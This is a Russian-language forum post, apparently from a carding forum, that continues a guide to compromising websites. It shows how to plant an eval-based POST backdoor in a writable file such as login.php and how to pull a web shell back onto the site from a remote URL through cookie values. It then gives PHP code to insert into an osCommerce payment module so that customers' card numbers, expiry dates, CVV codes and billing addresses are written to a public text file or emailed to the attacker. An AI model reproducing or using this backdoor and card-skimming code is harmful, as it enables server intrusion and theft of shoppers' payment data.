В предыдущей части мы заливали шелл, теперь на нужно внедрить свой код (бэкдор), нужно это чтобы когда злой админушка удалил шелл и залатал дыры, мы смогли с легкостью перезалить шелл заново.
В интернете существует множество бэкдоров, чтобы было меньше палева в лог файлах рекомендую использовать post, cookie бэкдоры. Это значит что ваш зловещий код будет использоваться через пост либо куки, давайте разбере на примере.
К примеру имеем бэкдор:
Код:
eval($_POST['sys_call']);
Ищем доступные на запись файлы, к примеру login.php и после <? можете вставлять наш код.
Сохраняем. Теперь ваш бэкдор доступен по адресу к примеру site.com/login.php
Открываем оперу. Кликаем правой кнопокй -> исходный код (или ctrl + U)
убираем все лишнее и вставляем
Код:
нажимаем применить изменения
Теперь на нашей вкладке будет окошко для вставки нашего зловещего php кода.
К примеру напишем
Код:
phpinfo();
и кликаем отправить.
В итоге получаем phpinfo нашего сайта.
Чтобы перезалить наш шелл, нам необходим полный путь сайта до папки с правами на запись, чтото типа:
Код:
/www/site.de/home/tmp
Вставляем в окно:
Код:
copy($_COOKIE[ev2],$_COOKIE[ev3]);
Кликаем правой кнопкой > Настройки для сайта > Cookies
Выбираем любую строку и кликаем изменить, в поле имя пишем ev2 в значение [URL]http://site.com/shell.txt[/URL] где лежит наш шелл в txt
жмем ок, выбираем следующую строку и снова изменить, в поле имя ставим ev3 в поле значение ставим полный путь до папки с именем шелла /www/site.de/home/images/shell.php
Жмем везде ОК.
И жмем отправить, в итоге наш шелл будет доступен по адресу [URL]http://site.de/images/shell.php[/URL]
Это описан лишь один из бэкдоров, никто не запрещает вам использовать другие.
Теперь поговорим как собирать картон если он не записывается в базу.
Для начала узнаем какой файл используется как оплата картонкой, в osCommerce это можно узнать в разделе
Modules
-Payment Systems
по умолчанию все модули оплаты на этом движке находятся на /dev/www.site.com/htdocs/includes/modules/payment/
идем на шелле по этому пути и видим наш cc.php
Редактируем его.
Код:
$result = $cc_validation->validate($_POST['cc_number'], $_POST['cc_expires_month'], $_POST['cc_expires_year']);
Видим что данные карты передаются методом POST.
После этой строки вставляем наш ГОТОВЫЙ код (Если просмотреть файл полностью мы увидим все переменные которые были вставлены)
Код:
$BASE="/dev/www.site.com/htdocs/includes/cc.txt";
$p0=$_POST['cc_owner'];
$p1=$_POST['cc_number'];
$p2=$_POST['cc_expires_month'];
$p3=$_POST['cc_expires_year'];
$p4=$_POST['cc_cvv'];
$p5=$order->billing['street_address'];
$p6=$order->billing['city'];
$p7=$order->billing['postcode'];
$p8=$order->billing['state'];
$p9=$order->billing['country']['iso_code_2'];
$info="$p0|$p1|$p2/$p3|$p4|$p5|$p6|$p7|$p8|$p9\n";
$fd=fopen($BASE,«a+»);
fwrite($fd,$info);
fclose($fd);
Многие уже поняли что наши картонки будут храниться по адресу [URL=«
www.site.com/includes/cc.txt»]www.site.com/includes/cc.txt[/URL]
не забудьте поставить права на файл cc.txt 0777 (chmod 0777)
Но многим по душе мыло. Для отправки по емайл вставляем такой код
Код:
$p0=$_POST['cc_owner'];
$p1=$_POST['cc_number'];
$p2=$_POST['cc_expires_month'];
$p3=$_POST['cc_expires_year'];
$p4=$_POST['cc_cvv'];
$p5=$order->billing['street_address'];
$p6=$order->billing['city'];
$p7=$order->billing['postcode'];
$p8=$order->billing['state'];
$p9=$order->billing['country']['iso_code_2'];
$info="$p0|$p1|$p2/$p3|$p4|$p5|$p6|$p7|$p8|$p9\n";
mail(
[email protected], "", $info);
Где [
[email protected]]
[email protected][/EMAIL] ваш email
Я пользуюсь yahoo, мыло живет больше года)
Также в соседней теме h4v1 предложил такой код
Код:
<?php
if($_POST['PAY']) {
$_POST['creditcard']
$to = 'forme.com';
mail($to, $title);
}
?>
Не забудьте добавить свои переменные.
Каким пользоваться решать вам. Главное понять каким методом передается данные о картоне (post, get) и какие имена у номера карты exp и т.д., все это можно узнать в исходниках.
Отвечу на все интересующие вопросы в этой теме.
©f1rst for Net$ky
[url]http://netsky.pw/showthread.php?t=2497[/url]